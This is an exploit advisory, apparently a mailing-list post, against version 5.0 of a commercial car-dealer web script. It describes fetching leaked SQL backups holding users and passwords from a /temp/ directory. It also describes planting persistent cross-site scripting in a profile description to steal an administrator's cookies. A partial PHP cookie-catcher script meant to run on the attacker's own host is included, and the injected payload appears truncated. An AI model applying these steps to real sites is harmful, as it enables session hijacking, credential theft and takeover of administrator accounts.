______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] Acc Auto Dealer Script [ Persistent XSS / SQL backup ] # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Homepage : www.ssteam.ws # [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ... # # // Software Info # [x] Name : Auto Dealer Script # [x] Vendor : http://www.accscripts.com/autos/ # [x] Version : 5.0 # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # [SQL Backup] # # http://localhost/[path]/temp/ # and serach for .sql .You can find users & passwords # # [ Persistent XSS ] # # At the Auto Dealer Script you can register as an normal user and at your Control Panel # You can modify "Description" and put there an javascript code to steal cookies, Then if # Site admin visits your profile you can steal their cookies. EX : # # // Cookie Catcher "cookie.php" # You must Host somewhere cookie.php #======================================================================= IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); ?> #========================================================================= # # // And at your Description type : # #========================================================================= "/> #========================================================================= # # Now if site admin visits you'r profile their cookies will be saved at # http://host/cookie.html # [#]------------------------------------------------------------------------------------------[#] #EOF _________________________________________________________________ Windows Live Hotmail: Your friends can get your Facebook updates, right from HotmailŪ. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009